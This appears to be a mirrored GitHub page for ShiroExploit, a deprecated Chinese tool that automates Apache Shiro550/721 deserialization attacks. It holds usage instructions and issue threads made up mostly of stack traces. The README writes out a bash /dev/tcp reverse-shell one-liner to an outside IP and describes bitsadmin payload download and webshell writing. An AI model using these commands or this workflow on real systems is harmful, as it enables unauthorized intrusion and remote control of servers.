feihong-cs / shiroexploit-deprecated Goto Github PK

Shiro550/Shiro721 一键化利用工具，支持多种回显方式

Java 99.84% CSS 0.16%

shiro shiro550 shiro721 shiro-exp shiro-poc shiro-exploit

shiroexploit-deprecated's Introduction

2019.11.9 update：

由于当初作者开发时能力有限，导致工具本身存在着笨重及问题较多等诸多缺点。目前有很多其他的优秀工具提供了对shiro检测/利用更好的支持（如更好的回显支持，更有效的gadget与直接支持内存shell等），此工具目前已相形见绌。请各位移步其他更优秀的项目，感谢各位的使用。

2019.9.20 update：

对回显方式进行了一次更新，希望现在能好用一点

2020.9.12 update：

很多回显方式在本地测试OK，但是在实际环境中却不行，这个问题我不知道该怎么解决，希望有师傅可以指导下或者一起讨论下。

ShiroExploit

支持对Shiro550（硬编码秘钥）和Shiro721（Padding Oracle）的一键化检测，支持多种回显方式

使用说明

第一步:按要求输入要检测的目标URL和选择漏洞类型

Shiro550无需提供rememberMe Cookie，Shiro721需要提供一个有效的rememberMe Cookie
可以手工指定特定的 Key/Gadget/EchoType（支持多选），如果不指定会遍历所有的 Key/Gadget/EchoType
复杂Http请求支持直接粘贴数据包

第二步: 选择攻击方式

选择 `使用 ceye.io 进行漏洞检测`

可以不进行任何配置，配置文件中已经预置了 CEYE 域名和对应的 Token，当然也可以对其进行修改。
程序会首先使用反序列化 SimplePrincipalCollection 的方式筛选出唯一 Key，然后依次调用各个 Gadget 生成 Payload
缺点：程序会使用 API：http://api.ceye.io/v1/records?token=a78a1cb49d91fe09e01876078d1868b2&type=dns&filter=[UUID] 查询检测结果，这个 API 有时候会无法正常访问，导致在这种方式下无法找到 Key 或者有效的 Gadget

选择 `使用 dnslog.cn 进行漏洞检测`

可以不进行任何配置，每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
程序会首先使用反序列化 SimplePrincipalCollection 的方式筛选出唯一 Key，然后依次调用各个 Gadget 生成 Payload
缺点：少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget，且 dnslog.cn 只会记录最近的10条 DNS 解析记录

选择 `使用 JRMP + dnslog 进行漏洞检测`

需要在 VPS 上通过命令java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port]开启HttpService/JRMPListener，并按照要求填入相应 IP 和端口
如果开启 HttpService/JRMPListener 时未指定端口号，则 HTTPService 默认监听 8080 端口，JRMPListener 默认监听 8088 端口
使用 JRMP 的方式进行漏洞检测，可以显著减小 cookie 大小
程序会首先使用反序列化 SimplePrincipalCollection 的方式筛选出唯一 Key，然后使用 JRMP 依次为各个 Gadget 生成对应的 JRMPListener

选择 `使用回显进行漏洞检测`

针对不出网的情况进行漏洞检测，此时可以检测的 Gadget 类型会少于使用 DNSLog 方式的 Gadget类型
程序会首先使用反序列化 SimplePrincipalCollection 的方式筛选出唯一 Key，然后依次判断可用的 Gadget 类型和回显方式
支持多种回显方式，回显方式和代码请参考 deserizationEcho
使用写文件回显方式时，可以提供一个静态资源 URL，程序会将此静态资源所在的目录当做写入目录，若不提供，则写入根目录
测试 vulhub 拉取的镜像及 Windows下用 Tomcat 搭建的测试环境，结果如下

第三步：检测漏洞并执行命令

程序在判断目标应用是否存在漏洞时，窗口上部的输入框无法进行输入。当程序检测出目标应用存在漏洞时，输入框可以进行输入并执行命令。
反弹shell（linux） 采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1 的方式反弹 shell
反弹shell（Windows） 采用 bitsadmin 下载指定 URL 的 exe 文件并执行的方式获取 shell
获取Webshell 直接在使用者给出的路径（目录需要真实存在）下写入 webshell, webshell 名称和后缀名由使用者自行指定，webshell 的内容从 config 目录下的 shell.jsp 中读取

备注

在使用漏洞检测主程序或者开启 HttpService/JRMPListener 时，均需要ysoserial.jar的支持，将ysoserial.jar和ShiroExploit.jar放置在同一目录即可。

致谢

感谢 AgeloVito 怕冷的企鹅 给予本项目的技术支持

shiroexploit-deprecated's People

Contributors

Stargazers

Watchers

Forkers

sry309 katsec tomandjarry thelostworldfree muyuxx 5l1v3r1 liutufang htesiege devilmaycrying huangyuan666 dennyx difa12321 bravery9 crackercat uuuunotfound quinn-yan yogistudio re13orn r4b3rt helloexp neuqcsa anna-q 0x6b7966 wang0098 grant555 bearowang smitnald evi1hack txrw ponusjang lwzxs tplusss pyking yijiank ivybao0628 heartsleep vrirus yuzhejk flaray laowang1026 fengzihk xxnbyy izj007 yuxiaoyou123 admintony rebootorz 7hang 123xiaoyi huseck naozibuhao j0k4r5 idealdreamlast feisec l0ading-x gcxtx zhuxinkai xiaoyaodashao a099 anquanzhu demossl jerrynotme yut0u xizhimen omiter morns0 javalangclass r0bbit xysh90hou wahello cream-sec yuzhen123 listenquiet liuyifei0226 nevinhappy qianniaoge dlzdy heyseafh underwood12 solitary-sen 963230432 nothingonyoumoon gayhub-blackerie netzeng 1337m4n mrknow001 cxchenye 18397527917 popmedd c0olw greg-wu liuchuanpei123 yeshuibo liuxiaomu1122 teemocaptain1234 kk98kk0 imbrave99 winthorlimo pentration o7966 b1cx

shiroexploit-deprecated's Issues

检测不到漏洞

手工检测漏洞存在，并且收到了JRMP通讯，工具不行。。。。
可以加我微信，Git同ID

两点建议

第一：
期待加上wyzxxz中的gadget
参考地址：https://github.com/wyzxxz/shiro_rce

第二：
在我大量的测试中发现，只给定URL交给您的程序去探测的话会有很多本来有洞的无法探测到
建议，给定一个配置文件或者输入框，让用户将burp拦截到的原本请求包，交给程序去探测

第三：对于key，建议不硬编码，方便我们才平时的测试中加入自己收集到的key
期待您的回复

获取Webshell时一直显示404

师傅好，使用您的工具在尝试获取Webshell时，工具提示是成功写入的，可访问的时候一直404，怀疑并没有成功写入Webshell。

config目录下也是放入了shell.jsp的

关于检查rememberMe是否真实存在

正常的逻辑如下：在探测key时，正确的key不返回rememberMe的headers头，在key错误时会返回rememberMe=deleteMe。

但是在新版本工具中并没有进行判断错误情况，直接判断了“如果不返回rememberMe，则key正确”。造成误报。

[] After RoundTask: 850504030201
[] After RoundTask: 07850504030201
[] After RoundTask: 0807850504030201
[] After RoundTask: 090807850504030201
[] After RoundTask: 0a090807850504030201
[] After RoundTask: 0b0a090807850504030201
[] After RoundTask: 880b0a090807850504030201
[] After RoundTask: 0d880b0a090807850504030201
[] After RoundTask: 0e0d880b0a090807850504030201
[] After RoundTask: 0f0e0d880b0a090807850504030201
[] After RoundTask: 100f0e0d880b0a090807850504030201
[+] Get intermediary: 100f0e0d880b0a090807850504030201
[+] Get cipherText: 7e7b6760ed0c0a0309078f6261775074
[] Calulating block 44
[] After RoundTask: 01
[] After RoundTask: 0201
[] After RoundTask: 030201
[] After RoundTask: 04030201
[] After RoundTask: 0504030201
[] After RoundTask: 060504030201
[] After RoundTask: 07060504030201
[] After RoundTask: 6d07060504030201
Exception in thread "Thread-6" java.util.concurrent.RejectedExecutionException: Task com.shiroexploit.core.RoundTask$1@36fa4687 rejected from java.util.concurrent.ThreadPoolExecutor@4b2f7758[Terminated, pool size = 0, active threads = 0, queued tasks = 0, completed tasks = 1]
at java.util.concurrent.ThreadPoolExecutor$AbortPolicy.rejectedExecution(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.reject(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.execute(Unknown Source)
at com.shiroexploit.core.RoundTask.start(RoundTask.java:42)
at com.shiroexploit.core.PaddingOracle.getIntermediary(PaddingOracle.java:22)
at com.shiroexploit.core.PaddingOracle.encrypt(PaddingOracle.java:82)
at com.shiroexploit.vulnverifier.Shiro721VerifiertUsingCeye.getValidGadget(Shiro721VerifiertUsingCeye.java:36)
at com.shiroexploit.gui.MainPane$6.run(MainPane.java:372)
at java.lang.Thread.run(Unknown Source)

测试环境https://hub.docker.com/r/vulfocus/shiro-721

不知道为什么我只能检测到一个key

java版本为java version "1.8.0_261"
Java(TM) SE Runtime Environment (build 1.8.0_261-b12)
Java HotSpot(TM) 64-Bit Server VM (build 25.261-b12, mixed mode)

打扰，有个错误不明白

windows server 2016 在运行之后报错如下：
[+] Find Valid Gadget: CommonsCollections9
[+] Find Valid Gadget: CommonsCollections6
Exception in thread "Thread-6" java.lang.IllegalStateException: Not on FX application thread; currentThread = Thread-6
at com.sun.javafx.tk.Toolkit.checkFxUserThread(Unknown Source)
at com.sun.javafx.tk.quantum.QuantumToolkit.checkFxUserThread(Unknown Source)
at javafx.scene.Scene.addToDirtyList(Unknown Source)
at javafx.scene.Node.addToSceneDirtyList(Unknown Source)
at javafx.scene.Node.impl_markDirty(Unknown Source)
at javafx.scene.Node.notifyParentsOfInvalidatedCSS(Unknown Source)
at javafx.scene.Node.requestCssStateTransition(Unknown Source)
at javafx.scene.Node.pseudoClassStateChanged(Unknown Source)
at javafx.scene.Node$10.invalidated(Unknown Source)
at javafx.beans.property.BooleanPropertyBase.markInvalid(Unknown Source)
at javafx.beans.property.BooleanPropertyBase.set(Unknown Source)
at javafx.scene.Node.setDisabled(Unknown Source)
at javafx.scene.Node.updateDisabled(Unknown Source)
at javafx.scene.Node.access$500(Unknown Source)
at javafx.scene.Node$MiscProperties$8.invalidated(Unknown Source)
at javafx.beans.property.BooleanPropertyBase.markInvalid(Unknown Source)
at javafx.beans.property.BooleanPropertyBase.set(Unknown Source)
at javafx.scene.Node.setDisable(Unknown Source)
at com.shiroexploit.gui.MainPane$9.run(MainPane.java:458)
at java.lang.Thread.run(Unknown Source)

望解答，谢谢

建议：增加对dns-log的自定义

建议：增加对dns-log的自定义
现在很多安全设备对dnslog.cn与 ceye.io会进行黑名单封禁，所以增加个自定义dnslog域名的，这样就可以误报，这个很重要我觉得，加上这个自定义功能这个工具就完美了～～～

怎么用了

下载下来哪里有打开地方

721爆破时报错

[] After RoundTask: 31ddad78
org.apache.commons.codec.DecoderException: Odd number of characters.
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:99)
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:80)
at com.shiroexploit.util.Tools.generatePayload(Tools.java:69)
at com.shiroexploit.core.RoundTask$1.run(RoundTask.java:53)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
[] After RoundTask: 1531ddad78
org.apache.commons.codec.DecoderException: Odd number of characters.
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:99)
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:80)
at com.shiroexploit.util.Tools.generatePayload(Tools.java:69)
at com.shiroexploit.core.RoundTask$1.run(RoundTask.java:53)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
[] After RoundTask: 161531ddad78
[] After RoundTask: 4f161531ddad78
[] After RoundTask: 0c4f161531ddad78
[] After RoundTask: 090c4f161531ddad78
[] After RoundTask: 0b090c4f161531ddad78
[] After RoundTask: 030b090c4f161531ddad78
org.apache.commons.codec.DecoderException: Odd number of characters.
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:99)
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:80)
at com.shiroexploit.util.Tools.generatePayload(Tools.java:69)
at com.shiroexploit.core.RoundTask$1.run(RoundTask.java:53)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
[*] After RoundTask: 1c030b090c4f161531ddad78
org.apache.commons.codec.DecoderException: Odd number of characters.
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:99)
at org.apache.commons.codec.binary.Hex.decodeHex(Hex.java:80)
at com.shiroexploit.util.Tools.generatePayload(Tools.java:69)
at com.shiroexploit.core.RoundTask$1.run(RoundTask.java:53)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)

希望新增功能——支持http代理选项

跑key遇到意外错误

jdk版本：

各位大佬，你们jdk版本是多少。14瑟瑟发抖啊

把ysoserial.jar放在同目录下后，一直卡住

把ysoserial.jar放在同目录下后，一直卡在下面这个界面

怎么编译源码，编译报错了怎么办，能给一个详细的流程吗

721爆破有个不当之处可否修复

会逐个尝试Gadget爆破得出不同的rememberMe，每个都有近百个到几百个blocks，停不下来。假如第一个Gadget爆破出了一个rememberMe，可否停下来，便于开始执行命令

原因: java.lang.NoClassDefFoundError: javafx/application/Application

老铁你好，我这java环境下直接运行总是出现这个错误，这个需要什么配置码？
java -jar ShiroExploit-v2.0.jar
错误: 找不到或无法加载主类 com.MainApp
原因: java.lang.NoClassDefFoundError: javafx/application/Application

java -version
java version "15.0.1" 2020-10-20
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)

网上查了下没啥结果，看着像是缺个javafx库之类的，但是我也没听说java运行环境需要这个呀。我把这个库放到java安装对应目录内，运行后还是错误。

偶尔会报错Shiro550VerifiertUsingDNSLog

Exception in thread "Thread-8" java.lang.NullPointerException
at com.shiroexploit.vulnverifier.Shiro550VerifiertUsingDNSLog.getValidGadget(Shiro550VerifiertUsingDNSLog.java:42)
at com.shiroexploit.gui.MainPane$6.run(MainPane.java:361)
at java.lang.Thread.run(Thread.java:748)

Shiro550VerifiertWithJRMP问题

Shiro550VerifiertWithJRMP 模式下 fuzz出来的key是错误的，本来应该是另一个key，不知道为啥程序会给出一个错误的key

您输入的http请求解析后无法正常访问

用burp发包能正常返回，但是这里提示您输入的http请求解析后无法正常访问，

550 windows反弹shell不行。[抱大腿]

建议增加判断回显的方式

openjdk version "1.8.0_312"出现错误: 找不到或无法加载主类 com.shiroexploit.gui.StartPane

$ java -jar ShiroExploit.jar
错误: 找不到或无法加载主类 com.shiroexploit.gui.StartPane
$ java -version
openjdk version "1.8.0_312"
OpenJDK Runtime Environment (Zulu 8.58.0.13-CA-macos-aarch64) (build 1.8.0_312-b07)
OpenJDK 64-Bit Server VM (Zulu 8.58.0.13-CA-macos-aarch64) (build 25.312-b07, mixed mode)
�mac m1 java最低只能安装这个版本了，能指导下怎么解决么

怎么编译成jar呢

code怎么编译成jar？能讲一下吗

期待增加回显的版本

使用jetty回显碰到[invalid type code: CA]

有大佬碰到过么？

2020-10-26 18:39:31,406 DEBUG [org.apache.shiro.mgt.AbstractRememberMeManager]: There was a failure while trying to retrieve remembered principals.  This could be due to a configuration problem or corrupted principals.  This could also be due to a recently changed encryption key.  The remembered identity will be forgotten and not used for this request.
org.apache.shiro.io.SerializationException: Unable to deserialze argument byte array.
	at org.apache.shiro.io.DefaultSerializer.deserialize(DefaultSerializer.java:82)
	at org.apache.shiro.mgt.AbstractRememberMeManager.deserialize(AbstractRememberMeManager.java:516)
	at org.apache.shiro.mgt.AbstractRememberMeManager.convertBytesToPrincipals(AbstractRememberMeManager.java:433)
	at org.apache.shiro.mgt.AbstractRememberMeManager.getRememberedPrincipals(AbstractRememberMeManager.java:398)
	at org.apache.shiro.mgt.DefaultSecurityManager.getRememberedIdentity(DefaultSecurityManager.java:604)
	at org.apache.shiro.mgt.DefaultSecurityManager.resolvePrincipals(DefaultSecurityManager.java:492)
	at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:342)
	at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:846)
	at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
	at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
	at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
	at org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1759)
	at org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:583)
	at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
	at org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:548)
	at org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:226)
	at org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1180)
	at org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:513)
	at org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:185)
	at org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1112)
	at org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141)
	at org.eclipse.jetty.server.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:213)
	at org.eclipse.jetty.server.handler.HandlerCollection.handle(HandlerCollection.java:119)
	at org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:134)
	at org.eclipse.jetty.server.Server.handle(Server.java:539)
	at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:333)
	at org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:251)
	at org.eclipse.jetty.io.AbstractConnection$ReadCallback.succeeded(AbstractConnection.java:283)
	at org.eclipse.jetty.io.FillInterest.fillable(FillInterest.java:108)
	at org.eclipse.jetty.io.SelectChannelEndPoint$2.run(SelectChannelEndPoint.java:93)
	at org.eclipse.jetty.util.thread.strategy.ExecuteProduceConsume.executeProduceConsume(ExecuteProduceConsume.java:303)
	at org.eclipse.jetty.util.thread.strategy.ExecuteProduceConsume.produceConsume(ExecuteProduceConsume.java:148)
	at org.eclipse.jetty.util.thread.strategy.ExecuteProduceConsume.run(ExecuteProduceConsume.java:136)
	at org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:671)
	at org.eclipse.jetty.util.thread.QueuedThreadPool$2.run(QueuedThreadPool.java:589)
	at java.lang.Thread.run(Thread.java:748)
Caused by: java.io.StreamCorruptedException: invalid type code: CA
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1601)
	at java.io.ObjectInputStream.readArray(ObjectInputStream.java:1950)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1567)
	at java.io.ObjectInputStream.readArray(ObjectInputStream.java:1950)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1567)
	at java.io.ObjectInputStream.access$800(ObjectInputStream.java:214)
	at java.io.ObjectInputStream$GetFieldImpl.readFields(ObjectInputStream.java:2452)
	at java.io.ObjectInputStream.readFields(ObjectInputStream.java:601)
	at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.readObject(TemplatesImpl.java:253)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1170)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2178)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2069)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1573)
	at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:2287)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2167)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2069)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1573)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:431)
	at java.util.HashMap.readObject(HashMap.java:1412)
	at sun.reflect.GeneratedMethodAccessor18.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1170)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2178)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2069)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1573)
	at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:2287)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2167)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2069)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1573)
	at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:2287)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2167)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2069)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1573)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:431)
	at org.apache.shiro.io.DefaultSerializer.deserialize(DefaultSerializer.java:77)
	... 36 more

java --module-path $PATH_TO_FX --add-modules javafx.controls -jar ShiroExploit.jar
Exception in Application start method
Exception in thread "JavaFX Application Thread" java.lang.NoClassDefFoundError: com/sun/javafx/scene/control/skin/BehaviorSkinBase
	at org.controlsfx.control.CheckComboBox.createDefaultSkin(CheckComboBox.java:304)
	at javafx.controls/javafx.scene.control.Control.doProcessCSS(Control.java:897)
	at javafx.controls/javafx.scene.control.Control$1.doProcessCSS(Control.java:89)
	at javafx.controls/com.sun.javafx.scene.control.ControlHelper.processCSSImpl(ControlHelper.java:67)
	at javafx.graphics/com.sun.javafx.scene.NodeHelper.processCSS(NodeHelper.java:146)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9456)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9449)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9449)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9449)
	at javafx.graphics/javafx.scene.Scene.doCSSPass(Scene.java:569)
	at javafx.graphics/javafx.scene.Scene$ScenePulseListener.pulse(Scene.java:2474)
	at javafx.graphics/com.sun.javafx.tk.Toolkit.lambda$runPulse$2(Toolkit.java:414)
	at java.base/java.security.AccessController.doPrivileged(Native Method)
	at javafx.graphics/com.sun.javafx.tk.Toolkit.runPulse(Toolkit.java:413)
	at javafx.graphics/com.sun.javafx.tk.Toolkit.firePulse(Toolkit.java:440)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.pulse(QuantumToolkit.java:564)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.pulse(QuantumToolkit.java:544)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.pulseFromQueue(QuantumToolkit.java:537)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.lambda$runToolkit$11(QuantumToolkit.java:343)
	at javafx.graphics/com.sun.glass.ui.InvokeLaterDispatcher$Future.run(InvokeLaterDispatcher.java:96)
Exception in thread "JavaFX Application Thread" java.lang.NoClassDefFoundError: com/sun/javafx/scene/control/skin/BehaviorSkinBase
	at org.controlsfx.control.CheckComboBox.createDefaultSkin(CheckComboBox.java:304)
	at javafx.controls/javafx.scene.control.Control.doProcessCSS(Control.java:897)
	at javafx.controls/javafx.scene.control.Control$1.doProcessCSS(Control.java:89)
	at javafx.controls/com.sun.javafx.scene.control.ControlHelper.processCSSImpl(ControlHelper.java:67)
	at javafx.graphics/com.sun.javafx.scene.NodeHelper.processCSS(NodeHelper.java:146)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9456)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9449)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9449)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9449)
	at javafx.graphics/javafx.scene.Scene.doCSSPass(Scene.java:569)
	at javafx.graphics/javafx.scene.Scene$ScenePulseListener.pulse(Scene.java:2474)
	at javafx.graphics/com.sun.javafx.tk.Toolkit.lambda$runPulse$2(Toolkit.java:414)
	at java.base/java.security.AccessController.doPrivileged(Native Method)
	at javafx.graphics/com.sun.javafx.tk.Toolkit.runPulse(Toolkit.java:413)
	at javafx.graphics/com.sun.javafx.tk.Toolkit.firePulse(Toolkit.java:440)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.pulse(QuantumToolkit.java:564)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.pulse(QuantumToolkit.java:544)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.pulseFromQueue(QuantumToolkit.java:537)
	at javafx.graphics/com.sun.javafx.tk.quantum.QuantumToolkit.lambda$runToolkit$11(QuantumToolkit.java:343)
	at javafx.graphics/com.sun.glass.ui.InvokeLaterDispatcher$Future.run(InvokeLaterDispatcher.java:96)
java.lang.reflect.InvocationTargetException
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.base/java.lang.reflect.Method.invoke(Method.java:566)
	at javafx.graphics/com.sun.javafx.application.LauncherImpl.launchApplicationWithArgs(LauncherImpl.java:464)
	at javafx.graphics/com.sun.javafx.application.LauncherImpl.launchApplication(LauncherImpl.java:363)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.base/java.lang.reflect.Method.invoke(Method.java:566)
	at java.base/sun.launcher.LauncherHelper$FXHelper.main(LauncherHelper.java:1051)
Caused by: java.lang.RuntimeException: Exception in Application start method
	at javafx.graphics/com.sun.javafx.application.LauncherImpl.launchApplication1(LauncherImpl.java:900)
	at javafx.graphics/com.sun.javafx.application.LauncherImpl.lambda$launchApplication$2(LauncherImpl.java:195)
	at java.base/java.lang.Thread.run(Thread.java:829)
Caused by: java.lang.NoClassDefFoundError: com/sun/javafx/scene/control/skin/BehaviorSkinBase
	at java.base/java.lang.ClassLoader.defineClass1(Native Method)
	at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1017)
	at java.base/java.security.SecureClassLoader.defineClass(SecureClassLoader.java:174)
	at java.base/jdk.internal.loader.BuiltinClassLoader.defineClass(BuiltinClassLoader.java:800)
	at java.base/jdk.internal.loader.BuiltinClassLoader.findClassOnClassPathOrNull(BuiltinClassLoader.java:698)
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClassOrNull(BuiltinClassLoader.java:621)
	at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:579)
	at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178)
	at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522)
	at org.controlsfx.control.CheckComboBox.createDefaultSkin(CheckComboBox.java:304)
	at javafx.controls/javafx.scene.control.Control.doProcessCSS(Control.java:897)
	at javafx.controls/javafx.scene.control.Control$1.doProcessCSS(Control.java:89)
	at javafx.controls/com.sun.javafx.scene.control.ControlHelper.processCSSImpl(ControlHelper.java:67)
	at javafx.graphics/com.sun.javafx.scene.NodeHelper.processCSS(NodeHelper.java:146)
	at javafx.graphics/javafx.scene.Parent.doProcessCSS(Parent.java:1400)
	at javafx.graphics/javafx.scene.Parent$1.doProcessCSS(Parent.java:125)
	at javafx.graphics/com.sun.javafx.scene.ParentHelper.processCSSImpl(ParentHelper.java:98)
	at javafx.graphics/com.sun.javafx.scene.NodeHelper.processCSS(NodeHelper.java:146)
	at javafx.graphics/javafx.scene.Parent.doProcessCSS(Parent.java:1400)
	at javafx.graphics/javafx.scene.Parent$1.doProcessCSS(Parent.java:125)
	at javafx.graphics/com.sun.javafx.scene.ParentHelper.processCSSImpl(ParentHelper.java:98)
	at javafx.graphics/com.sun.javafx.scene.NodeHelper.processCSS(NodeHelper.java:146)
	at javafx.graphics/javafx.scene.Parent.doProcessCSS(Parent.java:1400)
	at javafx.graphics/javafx.scene.Parent$1.doProcessCSS(Parent.java:125)
	at javafx.graphics/com.sun.javafx.scene.ParentHelper.processCSSImpl(ParentHelper.java:98)
	at javafx.graphics/com.sun.javafx.scene.NodeHelper.processCSS(NodeHelper.java:146)
	at javafx.graphics/javafx.scene.Node.processCSS(Node.java:9456)
	at javafx.graphics/javafx.scene.Scene.doCSSPass(Scene.java:569)
	at javafx.graphics/javafx.scene.Scene.preferredSize(Scene.java:1750)
	at javafx.graphics/javafx.scene.Scene$2.preferredSize(Scene.java:393)
	at javafx.graphics/com.sun.javafx.scene.SceneHelper.preferredSize(SceneHelper.java:66)
	at javafx.graphics/javafx.stage.Window$12.invalidated(Window.java:1111)
	at javafx.base/javafx.beans.property.BooleanPropertyBase.markInvalid(BooleanPropertyBase.java:110)
	at javafx.base/javafx.beans.property.BooleanPropertyBase.set(BooleanPropertyBase.java:145)
	at javafx.graphics/javafx.stage.Window.setShowing(Window.java:1187)
	at javafx.graphics/javafx.stage.Window.show(Window.java:1202)
	at javafx.graphics/javafx.stage.Stage.show(Stage.java:273)
	at com.shiroexploit.gui.StartPane.start(StartPane.java:64)
	at javafx.graphics/com.sun.javafx.application.LauncherImpl.lambda$launchApplication1$9(LauncherImpl.java:846)
	at javafx.graphics/com.sun.javafx.application.PlatformImpl.lambda$runAndWait$12(PlatformImpl.java:474)
